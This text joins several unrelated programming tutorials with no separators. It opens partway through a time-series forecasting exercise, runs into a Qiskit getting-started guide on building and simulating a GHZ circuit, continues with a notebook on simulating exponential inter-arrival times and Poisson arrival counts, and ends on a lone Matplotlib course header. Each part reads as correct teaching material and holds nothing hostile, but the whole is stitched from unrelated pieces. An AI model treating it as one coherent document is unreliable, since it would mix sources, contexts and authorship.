plot_series(time_valid, naive_forecast, start = 1, end = 151)# YOUR CODE HERE
# EXPECTED - Chart with X-Axis from 1100-1250 and Y Axes with series value and projections. Projections should be time stepped 1 unit 'after' series
```
Now let's compute the mean squared error and the mean absolute error between the forecasts and the predictions in the validation period:
```
print(keras.metrics.mean_squared_error(x_valid, naive_forecast).numpy()) # YOUR CODE HERE
print(keras.metrics.mean_absolute_error(x_valid, naive_forecast).numpy())# YOUR CODE HERE
# Expected Output
# 19.578304
# 2.6011968
```
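The Keras metrics above compute the usual formulas; writing them out in plain `numpy` makes the definitions explicit:

```python
import numpy as np

def mse(y_true, y_pred):
    return np.mean((y_true - y_pred) ** 2)   # mean squared error

def mae(y_true, y_pred):
    return np.mean(np.abs(y_true - y_pred))  # mean absolute error

y_true = np.array([1.0, 2.0, 3.0])
y_pred = np.array([1.5, 2.0, 2.0])
print(mse(y_true, y_pred))  # (0.25 + 0 + 1) / 3
print(mae(y_true, y_pred))  # (0.5 + 0 + 1) / 3 = 0.5
```

MSE penalizes large errors more heavily because of the square, which is why the two metrics can rank forecasts differently.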
That's our baseline, now let's try a moving average:
```
def moving_average_forecast(series, window_size):
"""Forecasts the mean of the last few values.
If window_size=1, then this is equivalent to naive forecast"""
forecast = []
for time in range(len(series) - window_size):
forecast.append(series[time:time + window_size].mean())
return np.array(forecast)
# YOUR CODE HERE
moving_avg = moving_average_forecast(series, 30)[split_time - 30:]# YOUR CODE HERE
plt.figure(figsize=(10, 6))
plot_series(time_valid, x_valid)
plot_series(time_valid, moving_avg)
# EXPECTED OUTPUT
# Chart with time series from 1100->1450+ on X
# Time series plotted
# Moving average plotted over it
print(keras.metrics.mean_squared_error(x_valid, moving_avg).numpy())# YOUR CODE HERE
print(keras.metrics.mean_absolute_error(x_valid, moving_avg).numpy())# YOUR CODE HERE
# EXPECTED OUTPUT
# 65.786224
# 4.3040023
diff_series = (series[365:] - series[:-365])# YOUR CODE HERE
diff_time = time[365:] # YOUR CODE HERE
plt.figure(figsize=(10, 6))
plot_series(diff_time, diff_series)
plt.show()
# EXPECTED OUTPUT: Chart with diffs
```
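The loop in `moving_average_forecast` costs O(n·window); a common cumulative-sum formulation produces the same forecasts in O(n):

```python
import numpy as np

def moving_average_forecast_fast(series, window_size):
    """Same forecasts as the looped version above, via a cumulative sum."""
    csum = np.cumsum(series, dtype="float64")
    # After this step, csum[i] holds the sum of the window ending at index i.
    csum[window_size:] = csum[window_size:] - csum[:-window_size]
    # Drop the last window (the loop stops one step earlier) and average.
    return csum[window_size - 1:-1] / window_size

toy = np.array([1., 2., 3., 4.])
print(moving_average_forecast_fast(toy, 2))  # [1.5 2.5]
```

The speedup matters little at this series length but becomes noticeable for long series or when the forecast is recomputed many times.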
Great, the trend and seasonality seem to be gone, so now we can use the moving average:
```
diff_moving_avg = moving_average_forecast(diff_series, 50)[split_time - 365 - 50:] # YOUR CODE HERE
plt.figure(figsize=(10, 6))
plot_series(time_valid, diff_series[split_time - 365:]) # YOUR CODE HERE
plot_series(time_valid, diff_moving_avg)# YOUR CODE HERE
plt.show()
# Expected output. Diff chart from 1100->1450 +
# Overlaid with moving average
```
Now let's bring back the trend and seasonality by adding the past values from t – 365:
```
diff_moving_avg_plus_past = series[split_time - 365:-365] + diff_moving_avg # YOUR CODE HERE
plt.figure(figsize=(10, 6))
plot_series(time_valid, x_valid)# YOUR CODE HERE
plot_series(time_valid, diff_moving_avg_plus_past)# YOUR CODE HERE
plt.show()
# Expected output: Chart from 1100->1450+ on X. Same chart as earlier for time series, but projection overlaid looks close in value to it
print(keras.metrics.mean_squared_error(x_valid, diff_moving_avg_plus_past).numpy())# YOUR CODE HERE
print(keras.metrics.mean_absolute_error(x_valid, diff_moving_avg_plus_past).numpy())# YOUR CODE HERE
# EXPECTED OUTPUT
# 8.498155
# 2.327179
```
Better than naive forecast, good. However the forecasts look a bit too random, because we're just adding past values, which were noisy. Let's use a moving averaging on past values to remove some of the noise:
```
diff_moving_avg_plus_smooth_past = moving_average_forecast(series[split_time - 370:-360], 10) + diff_moving_avg # YOUR CODE HERE
plt.figure(figsize=(10, 6))
plot_series(time_valid, x_valid)# YOUR CODE HERE
plot_series(time_valid, diff_moving_avg_plus_smooth_past)# YOUR CODE HERE
plt.show()
# EXPECTED OUTPUT:
# Similar chart to above, but the overlaid projections are much smoother
print(keras.metrics.mean_squared_error(x_valid, diff_moving_avg_plus_smooth_past).numpy())# YOUR CODE HERE
print(keras.metrics.mean_absolute_error(x_valid, diff_moving_avg_plus_smooth_past).numpy())# YOUR CODE HERE
# EXPECTED OUTPUT
# 12.527958
# 2.2034433
```
<img src="../../images/qiskit-heading.gif" alt="Note: In order for images to show up in this jupyter notebook you need to select File => Trusted Notebook" width="500 px" align="left">
# Getting Started with Qiskit
Here, we provide an overview of working with Qiskit. Qiskit provides the basic building blocks necessary to program quantum computers. The basic concept of Qiskit is an array of quantum circuits. A workflow using Qiskit consists of two stages: **Build** and **Execute**. **Build** allows you to make different quantum circuits that represent the problem you are solving, and **Execute** allows you to run them on different backends. After the jobs have been run, the data is collected. There are methods for putting this data together, depending on the program. This either gives you the answer you wanted, or allows you to make a better program for the next instance.
**Contents**
[Circuit basics](#circuit_basics)
[Simulating circuits with Qiskit Aer](#aer_simulation)
[Running circuits using the IBMQ provider](#ibmq_provider)
**Code imports**
```
import numpy as np
from qiskit import QuantumCircuit, ClassicalRegister, QuantumRegister
from qiskit import execute
```
## Circuit Basics <a id='circuit_basics'></a>
### Building the circuit
The basic elements needed for your first program are the QuantumCircuit, and QuantumRegister.
```
# Create a Quantum Register with 3 qubits.
q = QuantumRegister(3, 'q')
# Create a Quantum Circuit acting on the q register
circ = QuantumCircuit(q)
```
<div class="alert alert-block alert-info">
<b>Note:</b> Naming the QuantumRegister is optional and not required.
</div>
After you create the circuit with its registers, you can add gates ("operations") to manipulate the registers. As you proceed through the documentation you will find more gates and circuits; the below is an example of a quantum circuit that makes a three-qubit GHZ state
$$|\psi\rangle = \left(|000\rangle+|111\rangle\right)/\sqrt{2}.$$
To create such a state, we start with a 3-qubit quantum register. By default, each qubit in the register is initialized to $|0\rangle$. To make the GHZ state, we apply the following gates:
* A Hadamard gate $H$ on qubit 0, which puts it into a superposition state.
* A controlled-Not operation ($C_{X}$) between qubit 0 and qubit 1.
* A controlled-Not operation between qubit 0 and qubit 2.
On an ideal quantum computer, the state produced by running this circuit would be the GHZ state above.
In Qiskit, operations can be added to the circuit one-by-one, as shown below.
```
# Add a H gate on qubit 0, putting this qubit in superposition.
circ.h(q[0])
# Add a CX (CNOT) gate on control qubit 0 and target qubit 1, putting
# the qubits in a Bell state.
circ.cx(q[0], q[1])
# Add a CX (CNOT) gate on control qubit 0 and target qubit 2, putting
# the qubits in a GHZ state.
circ.cx(q[0], q[2])
```
## Visualize Circuit
You can visualize your circuit using Qiskit `QuantumCircuit.draw()`, which plots circuit in the form found in many textbooks.
```
circ.draw()
```
In this circuit, the qubits are put in order with qubit zero at the top and qubit two at the bottom. The circuit is read left-to-right (meaning that gates which are applied earlier in the circuit show up further to the left).
## Simulating circuits using Qiskit Aer <a id='aer_simulation'></a>
Qiskit Aer is our package for simulating quantum circuits. It provides many different backends for doing a simulation. Here we use the basic python version.
### Statevector backend
The most common backend in Qiskit Aer is the `statevector_simulator`. This simulator returns the quantum
state which is a complex vector of dimensions $2^n$ where $n$ is the number of qubits
(so be careful using this as it will quickly get too large to run on your machine).
<div class="alert alert-block alert-info">
When representing the state of a multi-qubit system, the tensor order used in qiskit is different from that used in most physics textbooks. Suppose there are $n$ qubits, and qubit $j$ is labeled as $Q_{j}$. In most textbooks (such as Nielsen and Chuang's "Quantum Computation and Information"), the basis vectors for the $n$-qubit state space would be labeled as $Q_{0}\otimes Q_{1} \otimes \cdots \otimes Q_{n}$. **This is not the ordering used by qiskit!** Instead, qiskit uses an ordering in which the $n^{\mathrm{th}}$ qubit is on the <em><strong>left</strong></em> side of the tensor product, so that the basis vectors are labeled as $Q_n\otimes \cdots \otimes Q_1\otimes Q_0$.
For example, if qubit zero is in state 0, qubit 1 is in state 0, and qubit 2 is in state 1, qiskit would represent this state as $|100\rangle$, whereas most physics textbooks would represent it as $|001\rangle$.
This difference in labeling affects the way multi-qubit operations are represented as matrices. For example, qiskit represents a controlled-X ($C_{X}$) operation with qubit 0 being the control and qubit 1 being the target as
$$C_X = \begin{pmatrix} 1 & 0 & 0 & 0 \\ 0 & 0 & 0 & 1 \\ 0 & 0 & 1 & 0 \\ 0 & 1 & 0 & 0 \\\end{pmatrix}.$$
</div>
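This little-endian convention can be checked with plain arithmetic: Qiskit prints qubit $n-1$ leftmost, so the integer index of a basis state in the statevector is $\sum_j q_j 2^{j}$. A small sketch, no Qiskit required (the helper name is ours, not a Qiskit API):

```python
def qiskit_basis_label(qubit_values):
    """qubit_values[j] is the state of qubit j; Qiskit prints qubit n-1 first."""
    return ''.join(str(b) for b in reversed(qubit_values))

# qubit 0 -> 0, qubit 1 -> 0, qubit 2 -> 1: Qiskit labels this |100>
print(qiskit_basis_label([0, 0, 1]))          # 100
print(int(qiskit_basis_label([0, 0, 1]), 2))  # index 4 in the statevector
```

A textbook ordering would label the same physical state $|001\rangle$, matching the example in the note above.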
To run the above circuit using the statevector simulator, first you need to import Aer and then set the backend to `statevector_simulator`.
```
# Import Aer
from qiskit import BasicAer
# Run the quantum circuit on a statevector simulator backend
backend = BasicAer.get_backend('statevector_simulator')
```
Now that we have chosen the backend, it's time to compile and run the quantum circuit. In Qiskit we provide the `execute` function for this. ``execute`` returns a ``job`` object that encapsulates information about the job submitted to the backend.
<div class="alert alert-block alert-info">
<b>Tip:</b> You can obtain the above parameters in Jupyter. Simply place the text cursor on a function and press Shift+Tab.
</div>
```
# Create a Quantum Program for execution
job = execute(circ, backend)
```
When you run a program, a job object is made that has the following two useful methods:
`job.status()` and `job.result()` which return the status of the job and a result object respectively.
<div class="alert alert-block alert-info">
<b>Note:</b> Jobs run asynchronously but when the result method is called it switches to synchronous and waits for it to finish before moving on to another task.
</div>
```
result = job.result()
```
The results object contains the data and Qiskit provides the method
`result.get_statevector(circ)` to return the state vector for the quantum circuit.
```
outputstate = result.get_statevector(circ, decimals=3)
print(outputstate)
```
Qiskit also provides a visualization toolbox to allow you to view these results.
Below, we use the visualization function to plot the real and imaginary components of the state vector.
```
from qiskit.tools.visualization import plot_state_city
plot_state_city(outputstate)
```
### Unitary backend
Qiskit Aer also includes a `unitary_simulator` that works _provided all the elements in the circuit are unitary operations_. This backend calculates the $2^n \times 2^n$ matrix representing the gates in the quantum circuit.
```
# Run the quantum circuit on a unitary simulator backend
backend = BasicAer.get_backend('unitary_simulator')
job = execute(circ, backend)
result = job.result()
# Show the results
print(result.get_unitary(circ, decimals=3))
```
### OpenQASM backend
The simulators above are useful because they provide information about the state output by the ideal circuit and the matrix representation of the circuit. However, a real experiment terminates by _measuring_ each qubit (usually in the computational $|0\rangle, |1\rangle$ basis). Without measurement, we cannot gain information about the state. Measurements cause the quantum system to collapse into classical bits.
For example, suppose we make independent measurements on each qubit of the three-qubit GHZ state
$$|\psi\rangle = \left(|000\rangle+|111\rangle\right)/\sqrt{2},$$
and let $xyz$ denote the bitstring that results. Recall that, under the qubit labeling used by Qiskit, $x$ would correspond to the outcome on qubit 2, $y$ to the outcome on qubit 1, and $z$ to the outcome on qubit 0. This representation of the bitstring puts the most significant bit (MSB) on the left, and the least significant bit (LSB) on the right. This is the standard ordering of binary bitstrings. We order the qubits in the same way, which is why Qiskit uses a non-standard tensor product order.
The probability of obtaining outcome $xyz$ is given by
$$\mathrm{Pr}(xyz) = |\langle xyz | \psi \rangle |^{2}.$$
By explicit computation, we see there are only two bitstrings that will occur: $000$ and $111$. If the bitstring $000$ is obtained, the state of the qubits is $|000\rangle$, and if the bitstring is $111$, the qubits are left in the state $|111\rangle$. The probability of obtaining 000 or 111 is the same; namely, 1/2:
$$\begin{align}
\mathrm{Pr}(000) &= |\langle 000 | \psi \rangle |^{2} = \frac{1}{2}\\
\mathrm{Pr}(111) &= |\langle 111 | \psi \rangle |^{2} = \frac{1}{2}.
\end{align}$$
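These probabilities can be checked numerically from the statevector: the GHZ state has amplitude $1/\sqrt{2}$ on $|000\rangle$ (index 0) and on $|111\rangle$ (index 7), and $\mathrm{Pr}(xyz) = |\langle xyz|\psi\rangle|^{2}$ is just the squared modulus of each entry. A quick `numpy` check:

```python
import numpy as np

psi = np.zeros(8, dtype=complex)
psi[0] = psi[7] = 1 / np.sqrt(2)  # (|000> + |111>) / sqrt(2)

probs = np.abs(psi) ** 2          # Pr(xyz) = |<xyz|psi>|^2
print(probs[0], probs[7])         # both ~0.5; all other entries are 0
```

The six remaining entries are exactly zero, which is why only the bitstrings 000 and 111 can ever be observed.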
To simulate a circuit that includes measurement, we need to add measurements to the original circuit above, and use a different Aer backend.
```
# Create a Classical Register with 3 bits.
c = ClassicalRegister(3, 'c')
# Create a Quantum Circuit
meas = QuantumCircuit(q, c)
meas.barrier(q)
# map the quantum measurement to the classical bits
meas.measure(q,c)
# The Qiskit circuit object supports composition using
# the addition operator.
qc = circ+meas
#drawing the circuit
qc.draw()
```
This circuit adds a classical register, and three measurements that are used to map the outcome of qubits to the classical bits.
To simulate this circuit, we use the ``qasm_simulator`` in Qiskit Aer. Each run of this circuit will yield either the bitstring 000 or 111. To build up statistics about the distribution of the bitstrings (to, e.g., estimate $\mathrm{Pr}(000)$), we need to repeat the circuit many times. The number of times the circuit is repeated can be specified in the ``execute`` function, via the ``shots`` keyword.
```
# Use the qasm_simulator backend from BasicAer
backend_sim = BasicAer.get_backend('qasm_simulator')
# Execute the circuit on the qasm simulator.
# We've set the number of repeats of the circuit
# to be 1024, which is the default.
job_sim = execute(qc, backend_sim, shots=1024)
# Grab the results from the job.
result_sim = job_sim.result()
```
Once you have a result object, you can access the counts via the function `get_counts(circuit)`. This gives you the _aggregated_ binary outcomes of the circuit you submitted.
```
counts = result_sim.get_counts(qc)
print(counts)
```
Approximately 50 percent of the time the output bitstring is 000. Qiskit also provides a function `plot_histogram` which allows you to view the outcomes.
```
from qiskit.tools.visualization import plot_histogram
plot_histogram(counts)
```
The estimated outcome probabilities $\mathrm{Pr}(000)$ and $\mathrm{Pr}(111)$ are computed by taking the aggregate counts and dividing by the number of shots (times the circuit was repeated). Try changing the ``shots`` keyword in the ``execute`` function and see how the estimated probabilities change.
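The division described above is a one-liner on the counts dictionary. A small sketch, using hypothetical counts (the exact numbers vary from run to run):

```python
# Hypothetical counts from a 1024-shot run of the GHZ circuit
counts = {'000': 510, '111': 514}
shots = 1024

# Estimated probabilities: aggregated counts divided by the number of shots
probs = {bits: n / shots for bits, n in counts.items()}
print(probs)
```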
## Running circuits using the IBMQ provider <a id='ibmq_provider'></a>
To facilitate access to real quantum computing hardware, we have provided a simple API interface.
To access IBMQ devices, you'll need an API token. For the public IBM Q devices, you can generate an API token [here](https://quantumexperience.ng.bluemix.net/qx/account/advanced) (create an account if you don't already have one). For Q Network devices, log in to the q-console, click your hub, group, and project, and expand "Get Access" to generate your API token and access url.
Our IBMQ provider lets you run your circuit on real devices or on our HPC simulator. Currently, this provider exists within Qiskit, and can be imported as shown below. For details on the provider, see [The IBMQ Provider](the_ibmq_provider.ipynb).
```
from qiskit import IBMQ
```
After generating your API token, call: `IBMQ.save_account('MY_TOKEN')`. For Q Network users, you'll also need to include your access url: `IBMQ.save_account('MY_TOKEN', 'URL')`
This will store your IBMQ credentials in a local file. Unless your registration information has changed, you only need to do this once. You may now load your accounts by calling,
```
IBMQ.load_accounts()
```
Once your account has been loaded, you can view the list of backends available to you.
```
print("Available backends:")
IBMQ.backends()
```
### Running circuits on real devices
Today's quantum information processors are small and noisy, but are advancing at a fast pace. They provide a great opportunity to explore what [noisy, intermediate-scale quantum (NISQ)](https://arxiv.org/abs/1801.00862) computers can do.
The IBMQ provider uses a queue to allocate the devices to users. We now choose the device with the least busy queue that can support our program; the filter below keeps real (non-simulator) devices with more than 4 qubits, comfortably above the 3 qubits we need.
```
from qiskit.providers.ibmq import least_busy
large_enough_devices = IBMQ.backends(filters=lambda x: x.configuration().n_qubits > 4 and
not x.configuration().simulator)
backend = least_busy(large_enough_devices)
print("The best backend is " + backend.name())
```
To run the circuit on the backend, we need to specify the number of shots and the number of credits we are willing to spend to run the circuit. Then, we execute the circuit on the backend using the ``execute`` function.
```
from qiskit.tools.monitor import job_monitor
shots = 1024 # Number of shots to run the program (experiment); maximum is 8192 shots.
max_credits = 3 # Maximum number of credits to spend on executions.
job_exp = execute(qc, backend=backend, shots=shots, max_credits=max_credits)
job_monitor(job_exp)
```
``job_exp`` has a ``.result()`` method that lets us get the results from running our circuit.
<div class="alert alert-block alert-info">
<b>Note:</b> When the .result() method is called, the code block will wait until the job has finished before releasing the cell.
</div>
```
result_exp = job_exp.result()
```
Like before, the counts from the execution can be obtained using `get_counts(qc)`
```
counts_exp = result_exp.get_counts(qc)
plot_histogram([counts_exp,counts])
```
### Simulating circuits using a HPC simulator
The IBMQ provider also comes with a remote optimized simulator called ``ibmq_qasm_simulator``. This remote simulator is capable of simulating up to 32 qubits, and it can be used the same way as the remote real backends.
```
backend = IBMQ.get_backend('ibmq_qasm_simulator', hub=None)
shots = 1024 # Number of shots to run the program (experiment); maximum is 8192 shots.
max_credits = 3 # Maximum number of credits to spend on executions.
job_hpc = execute(qc, backend=backend, shots=shots, max_credits=max_credits)
result_hpc = job_hpc.result()
counts_hpc = result_hpc.get_counts(qc)
plot_histogram(counts_hpc)
```
### Retrieving a previously run job
If your experiment takes longer to run than you have time to wait around, or if you simply want to retrieve old jobs, the IBMQ backends allow you to do that.
First you would need to note your job's ID:
```
jobID = job_exp.job_id()
print('JOB ID: {}'.format(jobID))
```
Given a job ID, that job object can be later reconstructed from the backend using retrieve_job:
```
job_get = backend.retrieve_job(jobID)
```
and then the results can be obtained from the new job object.
```
job_get.result().get_counts(qc)
```
____
__Universidad Tecnológica Nacional, Buenos Aires__\
__Ingeniería Industrial__\
__Cátedra de Investigación Operativa__\
__Autor: Martín Palazzo__ (Mpalazzo@frba.utn.edu.ar) y __Rodrigo Maranzana__ (Rmaranzana@frba.utn.edu.ar)
____
# Simulación con distribución Exponencial
## Introduction
The goal of this _Notebook_ is to understand how to simulate values of a random variable that follows an exponential distribution, to process the results to extract relevant information, and to get familiar with several Python libraries along the way.
The exponential distribution is memoryless: its probabilities do not depend on the history of the process.
It is also extremely useful in many real-world situations. Some examples: industrial maintenance management, where we want to simulate the time between failures of a machine; and queueing theory, where the time between arrivals or departures is the random variable of interest.
## Development
First, we import some useful libraries: _random_, _NumPy_ and _math_ for the mathematical and probability work, _Matplotlib_ for plotting the results, and _SciPy_ for the theoretical distributions.
```
import random
import math
import numpy as np
import matplotlib.pyplot as plt
from scipy import stats
```
### Sampling function for an exponentially distributed random variable
We create a function to sample one value of an exponential random variable. As its first input, the function takes the rate parameter $\lambda$ of the process, which could, for example, represent the number of events per unit of time.
It also takes a value of a uniform random variable $u$ between 0 and 1, written as:
$u \sim U(0, 1)$
Inside the function, we compute the value of the random variable, which we call $t$, via the inverse-transform method for the exponential distribution:
$ t = - (1 \ / \ \lambda) \log{u}$
(Since $u$ and $1-u$ follow the same uniform distribution, the code below may equivalently use $- (1 \ / \ \lambda) \log(1-u)$.)
Therefore $t$ is an exponentially distributed random variable:
$t \sim Exp(\lambda)$
In operations-research exercises, the exponentially distributed variable to simulate will be $t$, representing **the time between arrivals** or **the time between departures**. Let's program it:
```
# We define the Python function "samplear_exponencial".
# Inputs: "lam" and "r"
# Output: the value of "t" from the inverse-transform expression
# "lam" is the lambda (rate) of the problem
# "r" is a random number sampled from a uniform distribution
def samplear_exponencial(lam, r):
    return - (1 / lam) * np.log(1 - r)
```
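As a quick sanity check of the inverse-transform sampler, the mean of many draws should approach the theoretical mean $1/\lambda$. A small sketch (the fixed seed is an assumption for reproducibility, not part of the original notebook):

```python
import random
import numpy as np

# Redefined here so this sketch is self-contained
def samplear_exponencial(lam, r):
    return - (1 / lam) * np.log(1 - r)

random.seed(0)   # assumption: fixed seed for reproducibility
lam = 5          # rate of 5 events per unit time -> theoretical mean 0.2
muestras = [samplear_exponencial(lam, random.random()) for _ in range(100_000)]
print(np.mean(muestras))  # close to 1 / lam = 0.2
```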
### Example: sampling an exponential random variable
We want to sample a value of an exponential random variable with mean $\mu = 0.2$. Recall that the mean, or expectation, of the exponential distribution is:
$\mathop{\mathbb{E}}[X] = 1 \ / \ \lambda$
Intuitively, this expectation can represent the mean time between events, so $\lambda$ is **the rate of events per unit of time**.
```
# define the value of the mean mu
mu = 0.2
# define lambda as the reciprocal of the mean
lam = 1 / mu
```
To obtain a value of the random variable, we simply call the __samplear_exponencial__ function created above. First, we compute the values it needs: the parameter $\lambda$ defined above, and a sample of the uniform random variable.
```
# 1) Sample the uniform random variable:
u = random.uniform(0.001, 0.999)
# 2) Sample the exponential random variable using the "samplear_exponencial" function defined above
valor_exp = samplear_exponencial(lam, u)
# Print the value:
print(f"A value of the exponential random variable is t = {valor_exp}")
```
In the previous step, we sampled the exponential distribution once and obtained a single value of $t$. Recall that _t_ is the time between events; these events can be arrivals or departures, for example. In other words, we simulated the random variable for "a single iteration". We can repeat the process to obtain another value of _t_ from the same exponential distribution; it will differ from the previous one because the uniform sample at the start takes a new random value each time.
```
# 1) sample the uniform random variable again:
u = random.uniform(0.001, 0.999)
# 2) use the new uniform random number U
# as the input of the "samplear_exponencial" function;
# lambda stays the same because we are simulating the same distribution
valor_exp = samplear_exponencial(lam, u)
# Print the value:
print(f"A value of the exponential random variable is t = {valor_exp}")
```
### Example: number of cars entering a highway per hour
Suppose we want to compute, by simulation, the number of cars per hour entering a highway through a given on-ramp. We make the following assumptions:
- All vehicles are identical.
- There are no rush hours; the flow of cars is constant.
- The time between vehicle arrivals follows an exponential distribution with a mean of 0.2 hours.
We also know the simulation will cover 200 arriving cars.
#### Simulating arrival times as an exponential random variable
We will simulate 200 vehicle arrival times. Note that each simulated value is formally the __"time between successive vehicle arrivals"__: the time at which a vehicle enters, measured from the previous arrival. We can therefore think of them as times relative to the last arrival.
For example, if the first sample is 0.7 hours and the second is 0.2 hours, the second vehicle entered 0.2 hours after the first. In absolute terms, the second vehicle entered at the sum of the two times, i.e. at 0.9 hours.
```
n = 200
mu = 0.2
lam = 1 / mu
```
First, we create a _NumPy_ vector filled with zeros, with length equal to the number of samples to draw.
```
tiempos = np.zeros(n)
# display the tiempos vector
tiempos
```
Since we want to draw 200 time samples, we iterate the function created earlier 200 times and store each result in the __tiempos__ vector created above. We can think of each iteration as an event in which a new vehicle enters.
```
# "for" loop where "i" steps from 0 to n-1 in increments of 1;
# each iteration of the loop simulates a new inter-arrival time
for i in range(0, n):
    # Sample the uniform random variable:
    u = random.uniform(0.001, 0.999)
    # Sample the exponential random variable:
    tiempos[i] = samplear_exponencial(lam, u)
```
Next, we print the first 20 sampled values, i.e. access the __tiempos__ vector. We print only the first 20 to avoid displaying too many numbers at once.
```
tiempos[0:20]
# Note: in a Jupyter Notebook we can display an object simply by evaluating its name.
# In other contexts we would have to write print(tiempos[0:20])
```
We use the bar chart from the _Matplotlib_ library to visualize the values stored in the __tiempos__ vector at each iteration: the _x_ axis of the plot shows the iterations, and the _y_ axis the corresponding value of the random variable.
```
# Create a figure and the bar chart:
plt.figure(figsize=(13,7))
plt.bar(range(0, n), tiempos)
# Set the title and axis labels:
plt.title(f'Simulated values of an exponential random variable after {n} iterations')
plt.ylabel('Time between arrivals')
plt.xlabel('Iteration')
# Show the plot:
plt.show()
```
#### Accumulated times
Here we compute the accumulated time at each iteration. Since what we simulated is the "time between arrivals", if we want to know the time at which a given vehicle entered, we need the running total.
We create a _NumPy_ vector of zeros, with one entry per iteration, to hold the accumulated time at each iteration. Its first entry is the first value generated in the __tiempos__ vector.
```
# Create a vector of zeros:
t_acumulado = np.zeros(n)
# Load the first entry with the first sampled time:
t_acumulado[0] = tiempos[0]
```
Then, we fill the vector with the accumulated values.
This is done with a __for__ loop: for any index $j$, we add the value of __t_acumulado__ at the previous index $j-1$ to the sample stored in __tiempos__ at the current index $j$.
```
for j in range(1, n):
    t_acumulado[j] = tiempos[j] + t_acumulado[j-1]
```
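The loop above is fine for illustration; NumPy's `cumsum` computes the same running total in a single vectorized call:

```python
import numpy as np

tiempos = np.array([0.7, 0.2, 0.5, 0.1])  # example inter-arrival times

# Vectorized equivalent of the accumulation loop
t_acumulado = np.cumsum(tiempos)
print(t_acumulado)  # running totals: 0.7, 0.9, 1.4, 1.5
```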
Next, we print the first 20 accumulated values, as before.
```
t_acumulado[0:20]
```
As with the raw simulations, we visualize the accumulated time per iteration with a bar chart.
```
# Create a figure and the bar chart:
plt.figure(figsize=(13,7))
plt.bar(range(0, n), t_acumulado)
# Set the title and axis labels:
plt.title(f'Accumulated inter-arrival time after {n} iterations')
plt.ylabel('Accumulated time between arrivals')
plt.xlabel('Iteration')
# Show the plot:
plt.show()
```
#### Number of arrivals per hour
In this section we use the accumulated-times vector __t_acumulado__ to compute how many arrivals occurred in each hour.
Since the accumulated-times vector gives the absolute arrival time of each vehicle, we only need to classify the vehicles by hour of arrival.
We create a vector in which each index represents an hour of arrival. For example, index 0 holds the vehicles that entered between hour 0 and hour 1.
Looking at __t_acumulado__, we know it accumulates more than 40 absolute hours. Since the values are in ascending order, the cutoff hour is the last value, and it determines the size of the counts vector we want to build. In other words, we will have one position per whole recorded hour, and in each one we count the vehicles that arrived during it.
```
# Create a vector in which each index represents the hour of arrival.
ult_hora = t_acumulado[-1]
horas = int(ult_hora)
arribos_horas = np.zeros(horas + 1).astype(int)
```
We iterate over each simulated vehicle and take its absolute (accumulated) arrival time.
A quick way to classify it is to take the integer part of the arrival time: if a vehicle entered at hour 3.25, it belongs to hour 3.
We then use that hour as an index into the __arribos_horas__ vector and increment it by one unit, meaning that one more vehicle arrived during that hour.
```
for i in range(0, n):
    # Get the accumulated time of arrival i:
    h = t_acumulado[i]
    # Take the integer part to find the hour it belongs to:
    h_i = int(h)
    # Increment the counter for that hour by 1.
    arribos_horas[h_i] = arribos_horas[h_i] + 1
```
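For reference, `np.bincount` produces the same per-hour tally in one call, counting how many times each integer (hour) occurs:

```python
import numpy as np

t_acumulado = np.array([0.3, 0.8, 1.2, 3.25, 3.9])  # example absolute arrival times

# Integer part of each arrival time = the hour it falls in
arribos_horas = np.bincount(t_acumulado.astype(int))
print(arribos_horas)  # [2 1 0 2]
```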
We print the first 15 values, again for ease of visualization.
```
arribos_horas[0:15]
```
We now plot the first 15 values of the __arribos_horas__ vector.
```
horas_vis = 15
# Create a figure and the bar chart:
plt.figure(figsize=(13,7))
plt.bar(range(0, horas_vis), arribos_horas[0:horas_vis])
# Set the title and axis labels:
plt.title(f'Simulated arrivals hour by hour over the first {horas_vis} hours')
plt.ylabel('Number of arrivals')
plt.xlabel('Hour')
# Show the plot:
plt.show()
```
#### Statistics on the time between arrivals
In this section we want to check that the simulations we are generating match the theoretical density we assumed at the start.
We plot a histogram of the simulated inter-arrival times, and overlay the theoretical probability density: an exponential with mean 0.2 (i.e. scale parameter 0.2, which corresponds to a rate of $\lambda = 5$).
```
# Create a figure:
plt.figure(figsize=(13,7))
# Theoretical exponential density:
xvals = np.linspace(0, np.max(tiempos))
yvals = stats.expon.pdf(xvals, scale=0.2)
plt.plot(xvals, yvals, c='r', label='Theoretical exponential')
plt.legend()
# Normalized histogram of the sampled times:
plt.hist(tiempos, density=True, bins=20, label='Inter-arrival time frequencies')
# Plot formatting:
plt.title('Histogram of hours between arrivals vs. exponential probability density')
plt.ylabel('Frequency of inter-arrival times')
plt.xlabel('Time between arrivals')
# Show:
plt.show()
```
Besides seeing that the theoretical exponential function fits the histogram values, we can see how they are distributed around the theoretical mean we set at the start.
#### Statistics on the number of arrivals
Here we do the same as before: we plot a histogram of the number of arrivals, then overlay the Poisson probability mass function.
We use the Poisson distribution because it is intimately related to the exponential: it is a known theoretical result that when inter-arrival times are exponentially distributed, the number of arrivals per interval follows a Poisson distribution.
```
# Create a figure:
plt.figure(figsize=(13,7))
# Normalized histogram of arrivals per hour:
plt.hist(arribos_horas, density=True, bins=np.max(arribos_horas), label='Arrival count frequencies')
# Theoretical Poisson probability mass function:
xvals = range(0, np.max(arribos_horas))
yvals = stats.poisson.pmf(xvals, mu=5)
plt.plot(xvals, yvals, 'ro', ms=8, mec='r')
plt.vlines(xvals, 0, yvals, colors='r', linestyles='-', lw=2)
# Plot formatting:
plt.title('Histogram of arrival counts vs. Poisson probability mass function')
plt.ylabel('Frequency of arrival counts')
plt.xlabel('Number of arrivals')
# Show:
plt.show()
```
Once more, besides seeing that the mass function fits the histogram values, we can see how they are distributed around the theoretical mean we set at the start.
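As a numeric check of this exponential–Poisson link, simulating many exponential inter-arrival times with rate $\lambda$ and counting arrivals per whole hour should give a mean count close to $\lambda$. A sketch (seed and sample size are assumptions of this example):

```python
import numpy as np

rng = np.random.default_rng(42)   # assumption: fixed seed for reproducibility
lam = 5                           # arrivals per hour
tiempos = rng.exponential(scale=1/lam, size=200_000)

llegadas = np.cumsum(tiempos)                       # absolute arrival times
por_hora = np.bincount(llegadas.astype(int))[:-1]   # drop the incomplete last hour
print(por_hora.mean())                              # close to lam = 5
```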
## Conclusion
In this Notebook we saw how to simulate values of an exponentially distributed random variable. We also checked the results graphically, relating the simulated values to their theoretical distributions.
These methods will be useful later for more complex simulations of waiting lines, connected industrial processes, or machine maintenance.
As points for discussion:
Which other distributions can be sampled with the inverse-transform method?
Since another distribution widely used in practice is the Normal, could we do the same as in this Notebook?
<p><font size="6"><b>Visualization - Matplotlib</b></font></p>
> *DS Data manipulation, analysis and visualization in Python*
> *May/June, 2021*
>
